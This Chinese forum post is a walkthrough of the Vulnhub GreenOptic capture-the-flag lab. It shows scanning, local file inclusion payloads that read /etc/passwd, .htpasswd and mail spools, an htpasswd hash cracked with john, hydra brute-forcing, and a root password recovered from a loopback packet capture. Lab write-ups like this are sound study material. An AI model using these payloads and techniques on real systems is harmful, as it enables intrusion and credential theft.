ToB企服应用市场:ToB评测及商务社交产业平台

标题: Vulnhub之GreenOptics靶机详细测试过程 [打印本页]

作者: 惊落一身雪    时间: 2023-4-29 21:43
标题: Vulnhub之GreenOptics靶机详细测试过程
GreenOptics

识别目标主机IP地址
  1. ─(kali㉿kali)-[~/Vulnhub/GreenOptic]
  2. └─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
  3. Currently scanning: Finished!   |   Screen View: Unique Hosts                                                              
  4.                                                                                                                            
  5. 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
  6. _____________________________________________________________________________
  7.    IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
  8. -----------------------------------------------------------------------------
  9. 192.168.56.1    0a:00:27:00:00:05      1      60  Unknown vendor                                                           
  10. 192.168.56.100  08:00:27:2b:10:e6      1      60  PCS Systemtechnik GmbH                                                   
  11. 192.168.56.254  08:00:27:31:b2:9c      1      60  PCS Systemtechnik GmbH      
复制代码
利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254
NMAP扫描
  1. ┌──(kali㉿kali)-[~/Vulnhub/GreenOptic]
  2. └─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
  3. Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-28 20:25 EDT
  4. Nmap scan report for inplainsight (192.168.56.254)
  5. Host is up (0.00039s latency).
  6. Not shown: 65377 filtered tcp ports (no-response), 153 filtered tcp ports (host-prohibited)
  7. PORT      STATE SERVICE VERSION
  8. 21/tcp    open  ftp     vsftpd 3.0.2
  9. 22/tcp    open  ssh     OpenSSH 7.4 (protocol 2.0)
  10. | ssh-hostkey:
  11. |   2048 462032edf07411edfda7a417abf6f021 (RSA)
  12. |   256 b6fb6410390ef9be8b5ad0d2413e6768 (ECDSA)
  13. |_  256 24270bc9355f277e1a8273e069cc0f96 (ED25519)
  14. 53/tcp    open  domain  ISC BIND 9.11.4-P2 (RedHat Enterprise Linux 7)
  15. | dns-nsid:
  16. |_  bind.version: 9.11.4-P2-RedHat-9.11.4-16.P2.el7_8.6
  17. 80/tcp    open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
  18. | http-methods:
  19. |_  Potentially risky methods: TRACE
  20. |_http-title: GreenOptic
  21. |_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
  22. 10000/tcp open  http    MiniServ 1.953 (Webmin httpd)
  23. |_http-title: Site doesn't have a title (text/html; Charset=utf-8).
  24. |_http-server-header: MiniServ/1.953
  25. MAC Address: 08:00:27:31:B2:9C (Oracle VirtualBox virtual NIC)
  26. Service Info: OSs: Unix, Linux; CPE: cpe:/o:redhat:enterprise_linux:7
  27. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  28. Nmap done: 1 IP address (1 host up) scanned in 184.73 seconds
复制代码
NMAP扫描结果表明目标主机有5个开放端口:21(ftp)、22(ssh)、53(dns)、80(http)、10000(http)
获得Shell
  1. ┌──(kali㉿kali)-[~/Vulnhub/GreenOptic]
  2. └─$ curl http://192.168.56.254:10000/                                                            
  3. <h1>Error - Document follows</h1>
  4. <p>This web server is running in SSL mode. Try the URL <a target="_blank" href='https://websrv01.greenoptic.vm:10000/'>https://websrv01.greenoptic.vm:10000/</a> instead.</p>
复制代码
说明需要添加主机记录到/etc/hosts文件:
  1. ┌──(kali㉿kali)-[~/Vulnhub/GreenOptic]
  2. └─$ sudo vim /etc/hosts                                       
  3. [sudo] password for kali:
  4.                                                                                                                               
  5. ┌──(kali㉿kali)-[~/Vulnhub/GreenOptic]
  6. └─$ cat /etc/hosts                  
  7. 127.0.0.1       localhost
  8. 127.0.1.1       kali
  9. ::1             localhost ip6-localhost ip6-loopback
  10. ff02::1         ip6-allnodes
  11. ff02::2         ip6-allrouters
  12. 192.168.56.254  websrv01.greenoptic.vm
复制代码
再次访问:
  1. https://websrv01.greenoptic.vm:10000/
复制代码
返回页面为用户登录界面,10000端口的信息收集暂时告一段落。
  1. ──(kali㉿kali)-[~/Vulnhub/GreenOptic]
  2. └─$ nikto -h http://192.168.56.254                                                                     
  3. - Nikto v2.1.6
  4. ---------------------------------------------------------------------------
  5. + Target IP:          192.168.56.254
  6. + Target Hostname:    192.168.56.254
  7. + Target Port:        80
  8. + Start Time:         2023-04-28 20:35:07 (GMT-4)
  9. ---------------------------------------------------------------------------
  10. + Server: Apache/2.4.6 (CentOS) PHP/5.4.16
  11. + The anti-clickjacking X-Frame-Options header is not present.
  12. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  13. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  14. + PHP/5.4.16 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
  15. + Apache/2.4.6 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
  16. + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
  17. + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
  18. + Retrieved x-powered-by header: PHP/5.4.16
  19. + OSVDB-3268: /css/: Directory indexing found.
  20. + OSVDB-3092: /css/: This might be interesting...
  21. + OSVDB-3268: /img/: Directory indexing found.
  22. + OSVDB-3092: /img/: This might be interesting...
  23. + OSVDB-3268: /icons/: Directory indexing found.
  24. + OSVDB-3092: /LICENSE.txt: License file found may identify site software.
  25. + OSVDB-3233: /icons/README: Apache default file found.
  26. + 8724 requests: 0 error(s) and 15 item(s) reported on remote host
  27. + End Time:           2023-04-28 20:36:00 (GMT-4) (53 seconds)
  28. ---------------------------------------------------------------------------
  29. + 1 host(s) tested
复制代码
nikto没有得到80端口有价值的信息。
  1. ┌──(kali㉿kali)-[~/Vulnhub/GreenOptic]
  2. └─$ gobuster dir -u http://192.168.56.254 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.js,.html,.txt,.sh
  3. ===============================================================
  4. Gobuster v3.3
  5. by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
  6. ===============================================================
  7. [+] Url:                     http://192.168.56.254
  8. [+] Method:                  GET
  9. [+] Threads:                 10
  10. [+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
  11. [+] Negative Status codes:   404
  12. [+] User Agent:              gobuster/3.3
  13. [+] Extensions:              txt,sh,php,js,html
  14. [+] Timeout:                 10s
  15. ===============================================================
  16. 2023/04/28 20:39:13 Starting gobuster in directory enumeration mode
  17. ===============================================================
  18. /index.html           (Status: 200) [Size: 17119]
  19. /.html                (Status: 403) [Size: 207]
  20. /img                  (Status: 301) [Size: 234] [--> http://192.168.56.254/img/]
  21. /account              (Status: 301) [Size: 238] [--> http://192.168.56.254/account/]
  22. /css                  (Status: 301) [Size: 234] [--> http://192.168.56.254/css/]
  23. /js                   (Status: 301) [Size: 233] [--> http://192.168.56.254/js/]
  24. /LICENSE.txt          (Status: 200) [Size: 17128]
  25. /statement.html       (Status: 200) [Size: 6687]
  26. /.html                (Status: 403) [Size: 207]
  27. Progress: 1321725 / 1323366 (99.88%)===============================================================
  28. 2023/04/28 20:41:18 Finished
  29. ===============================================================
  30.                                                                
复制代码
访问/account,返回是另一个用户登录。
  1. http://192.168.56.254/account/index.php?include=cookiewarning
复制代码
但是注意到URL,此处可能存在本地文件包含漏洞。
  1. ┌──(kali㉿kali)-[~/Vulnhub/GreenOptic]
  2. └─$ curl http://192.168.56.254/account/index.php?include=../../../../etc/passwd      
  3. <!DOCTYPE html>
  4. <html lang="en">
  5. root:x:0:0:root:/root:/bin/bash
  6. bin:x:1:1:bin:/bin:/sbin/nologin
  7. daemon:x:2:2:daemon:/sbin:/sbin/nologin
  8. adm:x:3:4:adm:/var/adm:/sbin/nologin
  9. lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
  10. sync:x:5:0:sync:/sbin:/bin/sync
  11. shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
  12. halt:x:7:0:halt:/sbin:/sbin/halt
  13. mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
  14. operator:x:11:0:operator:/root:/sbin/nologin
  15. games:x:12:100:games:/usr/games:/sbin/nologin
  16. ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
  17. nobody:x:99:99:Nobody:/:/sbin/nologin
  18. systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
  19. dbus:x:81:81:System message bus:/:/sbin/nologin
  20. polkitd:x:999:998:User for polkitd:/:/sbin/nologin
  21. sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
  22. postfix:x:89:89::/var/spool/postfix:/sbin/nologin
  23. chrony:x:998:996::/var/lib/chrony:/sbin/nologin
  24. apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
  25. mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
  26. tcpdump:x:72:72::/:/sbin/nologin
  27. sam:x:1000:1000::/home/sam:/bin/bash
  28. terry:x:1001:1001::/home/terry:/bin/bash
  29. named:x:25:25:Named:/var/named:/sbin/nologin
  30. alex:x:1002:1002::/home/alex:/bin/bash
  31. dovecot:x:97:97:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologin
  32. dovenull:x:997:993:Dovecot's unauthorized user:/usr/libexec/dovecot:/sbin/nologin
  33. monitor:x:1003:1003::/home/monitor:/bin/bash
  34. saslauth:x:996:76:Saslauthd user:/run/saslauthd:/sbin/nologin
  35. </body>
  36. </html>
复制代码
经过测试,目标页面确实存在本地文件包含漏洞,那接下来的任务就是如何利用该漏洞获得shell了
在Kali Linux上本地启动http.server(可以任意创建一个文本文件用于测试),然后访问以下URL:
  1. http://192.168.56.254/account/index.php?include=http://192.168.56.206:8000/test.txt
复制代码
从结果来看目标主机不存在远程文件包含漏洞,接下来看是否可以获取用户SSH私钥文件。
逐一测试各个用户(sam, terry, alex, monitor)家目录下/.ssh/id_rsa文件是否存在,如:
  1. http://192.168.56.254/account/index.php?include=../../../../home/monitor/.ssh/id_rsa
复制代码
经过测试没有获取任何SSH私钥文件。
接下来看是否可以破解这些用户的FTP密码
将所有普通用户生成用户字典:
  1. ──(kali㉿kali)-[~/Vulnhub/GreenOptic]
  2. └─$ cat user.dict                                                              
  3. sam
  4. terry
  5. alex
  6. monitor
复制代码
  1. ──(kali㉿kali)-[~/Vulnhub/GreenOptic]
  2. └─$ hydra -L user.dict -P /usr/share/wordlists/rockyou.txt ftp://192.168.56.254  -f
  3. Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
  4. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-28 21:56:28
  5. [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
  6. [DATA] max 16 tasks per 1 server, overall 16 tasks, 57377596 login tries (l:4/p:14344399), ~3586100 tries per task
  7. [DATA] attacking ftp://192.168.56.254:21/
复制代码
没有破解出密码。
因为作者给出明显的提示,域名是websrv01.greenoptic.vm,除了websrv01有其他子域名
  1. ──(kali㉿kali)-[~/Vulnhub/GreenOptic]
  2. └─$ dig @192.168.56.254 greenoptic.vm axfr
  3. ; <<>> DiG 9.18.8-1-Debian <<>> @192.168.56.254 greenoptic.vm axfr
  4. ; (1 server found)
  5. ;; global options: +cmd
  6. greenoptic.vm.          3600    IN      SOA     websrv01.greenoptic.vm. root.greenoptic.vm. 1594567384 3600 600 1209600 3600
  7. greenoptic.vm.          3600    IN      NS      ns1.greenoptic.vm.
  8. ns1.greenoptic.vm.      3600    IN      A       127.0.0.1
  9. recoveryplan.greenoptic.vm. 3600 IN     A       127.0.0.1
  10. websrv01.greenoptic.vm. 3600    IN      A       127.0.0.1
  11. greenoptic.vm.          3600    IN      SOA     websrv01.greenoptic.vm. root.greenoptic.vm. 1594567384 3600 600 1209600 3600
  12. ;; Query time: 4 msec
  13. ;; SERVER: 192.168.56.254#53(192.168.56.254) (TCP)
  14. ;; WHEN: Fri Apr 28 22:12:31 EDT 2023
  15. ;; XFR size: 6 records (messages 1, bytes 235)
复制代码
利用dig工具发现了recoveryplan子域名,将该子域名添加到/etc/hosts文件中:
  1. ──(kali㉿kali)-[~/Vulnhub/GreenOptic]
  2. └─$ sudo vim /etc/hosts                                       
  3. [sudo] password for kali:
  4.                                                                                                                               
  5. ┌──(kali㉿kali)-[~/Vulnhub/GreenOptic]
  6. └─$ cat /etc/hosts
  7. 127.0.0.1       localhost
  8. 127.0.1.1       kali
  9. ::1             localhost ip6-localhost ip6-loopback
  10. ff02::1         ip6-allnodes
  11. ff02::2         ip6-allrouters
  12. 192.168.56.254  websrv01.greenoptic.vm
  13. 192.168.56.254  recoveryplan.greenoptic.vm
复制代码
访问该子域名,需要网页基本认证,尝试一些弱口令失败,因为基本认证的用户名和密码存在.htpasswd文件中,看能否获取该文件内容
  1. (kali㉿kali)-[~/Vulnhub/GreenOptic]
  2. └─$ curl http://192.168.56.254/account/index.php?include=../../../../../var/www/.htpasswdstaff:$apr1$YQNFpPkc$rhUZOxRE55Nkl4EDn.1Po.
  3. </body>
  4. </html>
复制代码
将密码破解:
  1. ┌──(kali㉿kali)-[~/Vulnhub/GreenOptic]
  2. └─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
  3. Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
  4. Use the "--format=md5crypt-long" option to force loading these as that type instead
  5. Using default input encoding: UTF-8
  6. Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
  7. Will run 2 OpenMP threads
  8. Press 'q' or Ctrl-C to abort, almost any other key for status
  9. wheeler          (?)     
  10. 1g 0:00:00:00 DONE (2023-04-29 04:29) 9.090g/s 120436p/s 120436c/s 120436C/s guess1..lorena1
  11. Use the "--show" option to display all of the cracked passwords reliably
  12. Session completed.
复制代码
用上述用户名和密码访问
<img alt="" loading="lazy">
该帖子中有一个dpi.zip文件,将其下载到Kali Linux本地,而且提到:have e-mailed you the password,因此再用前面的本地文件包含漏洞读取邮件(发给sam的邮件):
  1. http://192.168.56.254/account/index.php?include=../../../../../var/mail/sam
复制代码
  1. From terry@greenoptic.vm  Sun Jul 12 16:13:45 2020
  2. Return-Path: <terry@greenoptic.vm>
  3. X-Original-To: sam
  4. Delivered-To: sam@websrv01.greenoptic.vm
  5. Received: from localhost (localhost [IPv6:::1])
  6.         by websrv01.greenoptic.vm (Postfix) with ESMTP id A8D371090085
  7.         for <sam>; Sun, 12 Jul 2020 16:13:18 +0100 (BST)
  8. Message-Id: <20200712151322.A8D371090085@websrv01.greenoptic.vm>
  9. Date: Sun, 12 Jul 2020 16:13:18 +0100 (BST)
  10. From: terry@greenoptic.vm
  11. Hi Sam, per the team message, the password is HelloSunshine123
复制代码
  1. ┌──(kali㉿kali)-[~/Vulnhub/GreenOptic]
  2. └─$ unzip dpi.zip      
  3. Archive:  dpi.zip
  4. [dpi.zip] dpi.pcap password:
  5.   inflating: dpi.pcap               
  6.                                                                                                                               
  7. ┌──(kali㉿kali)-[~/Vulnhub/GreenOptic]
  8. └─$ ls -alh
  9. total 148M
  10. drwxr-xr-x   2 kali kali 4.0K Apr 29 04:36 .
  11. drwxr-xr-x 121 kali kali 4.0K Apr 28 20:24 ..
  12. -rw-r--r--   1 kali kali 332K Jul 12  2020 dpi.pcap
  13. -rw-r--r--   1 kali kali  71K Apr 29 04:35 dpi.zip
  14. -rw-r--r--   1 kali kali   38 Apr 29 04:29 hash
  15. -rw-r--r--   1 kali kali 148M Apr 28 22:10 hydra.restore
  16. -rw-r--r--   1 root root 1.4K Apr 28 20:28 nmap_full_scan
  17. -rw-r--r--   1 kali kali   12 Apr 28 21:10 test.txt
  18. -rw-r--r--   1 kali kali   23 Apr 28 21:16 user.dict
复制代码
用上面本地文件包含漏洞读取到的密码解压缩dpi.zip文件,得到dpi.pcap
利用wireshark工具打开pcap文件,可以看到ftp的用户名和密码:
<img alt="" loading="lazy">
用户名:alex
密码: FwejAASD1
登录FTP服务:
  1. ┌──(kali㉿kali)-[~/Vulnhub/GreenOptic]
  2. └─$ ftp 192.168.56.254
  3. Connected to 192.168.56.254.
  4. 220 (vsFTPd 3.0.2)
  5. Name (192.168.56.254:kali): alex
  6. 331 Please specify the password.
  7. Password:
  8. 230 Login successful.
  9. Remote system type is UNIX.
  10. Using binary mode to transfer files.
  11. ftp> ls -alh
  12. 229 Entering Extended Passive Mode (|||28596|).
  13. ftp: Can't connect to `192.168.56.254:28596': No route to host
  14. 200 EPRT command successful. Consider using EPSV.
  15. 150 Here comes the directory listing.
  16. drwx------    3 1002     1002          136 Jul 12  2020 .
  17. drwxr-xr-x    6 0        0              57 Jul 12  2020 ..
  18. -rw-------    1 1002     1002          100 Jul 12  2020 .Xauthority
  19. lrwxrwxrwx    1 0        0               9 Jul 12  2020 .bash_history -> /dev/null
  20. -rw-r--r--    1 1002     1002           18 Apr 01  2020 .bash_logout
  21. -rw-r--r--    1 1002     1002          193 Apr 01  2020 .bash_profile
  22. -rw-r--r--    1 1002     1002          231 Apr 01  2020 .bashrc
  23. drwxr-xr-x    2 1002     1002           41 Jul 12  2020 .wireshark
  24. -rwx------    1 1002     1002           70 Jul 12  2020 user.txt
  25. 226 Directory send OK.
  26. ftp> get user.txt
  27. local: user.txt remote: user.txt
  28. 200 EPRT command successful. Consider using EPSV.
  29. 150 Opening BINARY mode data connection for user.txt (70 bytes).
  30. 100% |*********************************************************************************|    70       77.50 KiB/s    00:00 ETA
  31. 226 Transfer complete.
  32. 70 bytes received in 00:00 (54.73 KiB/s)
  33. ftp> pwd
  34. Remote directory: /home/alex
复制代码
用相同的用户名和密码登录SSH:
  1. ──(kali㉿kali)-[~/Vulnhub/GreenOptic]
  2. └─$ ssh alex@192.168.56.254                                       
  3. The authenticity of host '192.168.56.254 (192.168.56.254)' can't be established.
  4. ED25519 key fingerprint is SHA256:FkUejrDoIcwfG8KzsYAElBrX2BbWcAHiVWnR8k0k0Kk.
  5. This key is not known by any other names.
  6. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
  7. Warning: Permanently added '192.168.56.254' (ED25519) to the list of known hosts.
  8. alex@192.168.56.254's password:
  9. [alex@websrv01 ~]$ ls -alh
  10. total 20K
  11. drwx------. 3 alex alex 136 Jul 12  2020 .
  12. drwxr-xr-x. 6 root root  57 Jul 12  2020 ..
  13. lrwxrwxrwx. 1 root root   9 Jul 12  2020 .bash_history -> /dev/null
  14. -rw-r--r--. 1 alex alex  18 Apr  1  2020 .bash_logout
  15. -rw-r--r--. 1 alex alex 193 Apr  1  2020 .bash_profile
  16. -rw-r--r--. 1 alex alex 231 Apr  1  2020 .bashrc
  17. -rwx------. 1 alex alex  70 Jul 12  2020 user.txt
  18. drwxr-xr-x. 2 alex alex  41 Jul 12  2020 .wireshark
  19. -rw-------. 1 alex alex 100 Jul 12  2020 .Xauthority
  20. [alex@websrv01 ~]$ cd ..
  21. [alex@websrv01 home]$ ls -alh
  22. total 0
  23. drwxr-xr-x.  6 root    root     57 Jul 12  2020 .
  24. dr-xr-xr-x. 17 root    root    244 Jul 13  2020 ..
  25. drwx------.  3 alex    alex    136 Jul 12  2020 alex
  26. drwx------.  2 monitor monitor  62 Jul 12  2020 monitor
  27. drwx------.  2 sam     sam      62 Jul 12  2020 sam
  28. drwx------.  2 terry   terry    83 Jul 12  2020 terry
  29. [alex@websrv01 home]$
复制代码
提权
  1. [alex@websrv01 home]$ id
  2. uid=1002(alex) gid=1002(alex) groups=1002(alex),994(wireshark)
复制代码
发现id隶属于wireshark组,这样alex可以运行wireshark命令行工具dumpcap,即
用dumpcap工具抓包,抓本地环回接口的包,然后将其下载到Kali LInux本地,
利用wireshar k打开:
  1. AHJvb3QAQVNmb2pvajJlb3p4Y3p6bWVkbG1lZEFTQVNES29qM28=
复制代码
将其base64解码:
  1. ┌──(kali㉿kali)-[~/Vulnhub/GreenOptic]
  2. └─$ echo 'AHJvb3QAQVNmb2pvajJlb3p4Y3p6bWVkbG1lZEFTQVNES29qM28=' | base64 -d
  3. rootASfojoj2eozxczzmedlmedASASDKoj3o
复制代码
root密码为ASfojoj2eozxczzmedlmedASASDKoj3o:
  1. [root@websrv01 ~]# ls -alh
  2. total 60K
  3. dr-xr-x---.  5 root root 4.0K Jul 13  2020 .
  4. dr-xr-xr-x. 17 root root  244 Jul 13  2020 ..
  5. -rw-------.  1 root root 1.3K Jul 12  2020 anaconda-ks.cfg
  6. lrwxrwxrwx.  1 root root    9 Jul 12  2020 .bash_history -> /dev/null
  7. -rw-r--r--.  1 root root   18 Dec 29  2013 .bash_logout
  8. -rw-r--r--.  1 root root  176 Dec 29  2013 .bash_profile
  9. -rw-r--r--.  1 root root  176 Dec 29  2013 .bashrc
  10. -rw-r--r--.  1 root root  100 Dec 29  2013 .cshrc
  11. drwx------.  2 root root   99 Jul 12  2020 .gnupg
  12. -rw-------.  1 root root   45 Jul 12  2020 .lesshst
  13. -rw-r--r--.  1 root root   32 Jul 12  2020 .monit.id
  14. -rw-------.  1 root root  800 Apr 29 03:22 .monit.state
  15. drwxr-----.  3 root root   19 Jul 12  2020 .pki
  16. -rw-------.  1 root root 1.0K Jul 12  2020 .rnd
  17. -rwx------.  1 root root  837 Jul 12  2020 root.txt
  18. -rw-r--r--.  1 root root  129 Dec 29  2013 .tcshrc
  19. -rw-------   1 root root 5.7K Jul 13  2020 .viminfo
  20. drwxr-xr-x.  2 root root   41 Jul 12  2020 .wireshark
  21. -rw-------.  1 root root   50 Jul 12  2020 .Xauthority
  22. [root@websrv01 ~]# cat root.txt
  23. Congratulations on getting root!
  24.   ____                      ___        _   _      
  25. / ___|_ __ ___  ___ _ __  / _ \ _ __ | |_(_) ___
  26. | |  _| '__/ _ \/ _ \ '_ \| | | | '_ \| __| |/ __|
  27. | |_| | | |  __/  __/ | | | |_| | |_) | |_| | (__
  28. \____|_|  \___|\___|_| |_|\___/| .__/ \__|_|\___|
  29.                                 |_|            
  30.   
  31. You've overcome a series of difficult challenges, so well done!
  32. I'm happy to make my CTFs available for free. If you enjoyed doing the CTF, please leave a comment on my blog at https://security.caerdydd.wales - I will be happy for your feedback so I can improve them and make them more enjoyable in the future.
  33. *********
  34. Kindly place your vote on the poll located here to let me know how difficult you found it: https://security.caerdydd.wales/greenoptic-ctf/
  35. *********
  36. Thanks,
  37. bootlesshacker
  38. [root@websrv01 ~]#
复制代码
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!




欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/) Powered by Discuz! X3.4